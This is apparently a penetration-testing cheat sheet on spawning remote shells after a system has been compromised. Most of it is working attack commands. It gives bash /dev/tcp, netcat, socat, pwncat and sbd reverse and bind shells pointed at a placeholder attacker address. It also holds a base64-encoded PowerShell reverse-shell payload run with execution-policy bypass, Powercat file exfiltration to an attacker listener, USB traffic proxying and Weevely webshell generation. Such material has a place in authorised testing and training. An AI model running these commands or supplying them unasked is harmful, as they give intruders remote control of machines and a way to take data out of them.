Once we are able to execute code remotely using a known vulnerability, executing code from a SQL injection, or even through a RFI (Remote File Inclusion) it is extremely important to continue further with more advanced post-exploitation phases to be able to spawn a shell.
Direct shells are used when the compromised machine is directly reacheable from Internet and the firewall allows incoming traffic (INGRESS filtering) to that specific port.
We use reverse shells in most of the cases, because the compromised machine is sitting inside a LAN or it has several layers of security. One of the perks of reverse shells is that usually firewalls do not limit outgoing traffic (EGRESS filtering).
Classic methods to spawn remote shells
bash
How to trigger a bash reverse shell:
On attacker:
nc -nvv -lp 8080
On target:
bash -i >& /dev/tcp/$IP/8080 0>&1
netcat
How to trigger a netcat bindshell:
On target:
nc -nvvlp 8989 -e /bin/bash
On attacker:
nc -nvv $IP 8989
How to trigger a netcat reverse shell:
On attacker:
nc -nvvlp 8989 $IP
On target:
nc -nvv $IP 8989 -e /bin/bash
- To improve the shell (Method 1) https://twitter.com/JFaust0/status/1029009593114996736 @JFaust0:
Ctrl^Z stty raw -echo fg reset
- To improve interactive shell (Method 2):
python -c 'import pty; pty.spawn("/bin/bash")'
socat
Syntax:
socat [options] address1 address2
Examples of address:
- –
- stdio
- tcp4:localhost:1080
- tcp4-listen:8080 = tcp-l:8080
- udp4:host:2049
- udp4-l:500
- exec:/bin/ls,pty
- socks:socks.local:$IP:80
- proxy:proxy.local:$IP:443
- ssl-l:443,cert=./server.pem
- open:file.txt
- create:newfile.txt
- UDP4-DATAGRAM:255.255.255.255:9999,bind=:9999,range=192.168.0.0/24
- TUN:192.168.1.2/24,iff-up=1
How to trigger a bindshell with Socat:
On target:
socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
On attacker:
socat FILE:`tty`,raw,echo=0 TCP:$IP:1337
How to trigger a reverse shell with Socat:
On attacker:
socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
On target:
socat TCP4:$IP:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
pwncat
https://pwncat.readthedocs.io/en/latest/usage.html
https://github.com/cytopia/pwncat
pwncat -l 4444
Bind shell:
pwncat -l -e '/bin/bash' 8080 -k
Reverse shell:
pwncat -e '/bin/bash' example.com 4444 --reconn --recon-wait 1
Direct shell with mosh
Mosh allows resillient sessions for low signal or servers with intermittent connectivity.
mosh --ssh="ssh -p 2222" example.org
More info: https://mosh.org/#usage
How to trigger a direct or reverse shell with Msfvenom:
Learn how to spawn remote shells with Metasploit Msfvenom in Msfvenom Payloads Cheat Sheet.
How to trigger a direct or reverse shell with sbd:
Syntax:
connect (tcp): sbd [-options] host port listen (tcp): sbd -l -p port [-options]
Spawn a bindshell on port 4444 on target:
sbd -l -p 4444 -e bash -v -n
Connect to the bindshell from the attacker:
sbd 192.168.1.202 4444
Build a VPN with socat:
On server:
socat tcp-l:50500 TUN:192.168.10.2/24,iff-up=1
On client:
socat tcp:50500 TUN:192.168.10.3/24,iff-up=1
Windows Powershell Direct shell
$str='$client=New-Object System.Net.Sockets.TCPClient("'+$LHOST+'",'+$LPORT+');$stream= $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data =(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String );$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' $b=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) echo "powershell -ep bypass -nop -encodedcommand $b" | clip
Then directly paste (Ctrl+V) in the target terminal.
USB man-in-the-middle
- proxy USB over IP
Remote:
socat /dev/ttyUSB0,raw,echo=0 tcp-listen:1337,reuseaddr
Local:
socat PTY,raw,echo=0,link=/dev/ttyVUSB0 tcp:$TARGET:1337
tsh
Tiny SHell is an open-source UNIX backdoor (C language)
Powershell modules
Powercat
Powercat offers netcat functionality with powershell. No packages required. Good for data exfiltration.
In target:
powershell -exec bypass Import-Module .\powercat.ps1 powercat -l 80 -i input.txt -c $IP
In attacker machine:
nc -vvlp 80 > input.txt
Reference: https://github.com/besimorhino/powercat
Webshells
Weevely
python weevely.py generate AbC /var/www/html/AbC.txt
Learn how to create webshells with Metasploit Msfvenom in Msfvenom payloads Cheat Sheet.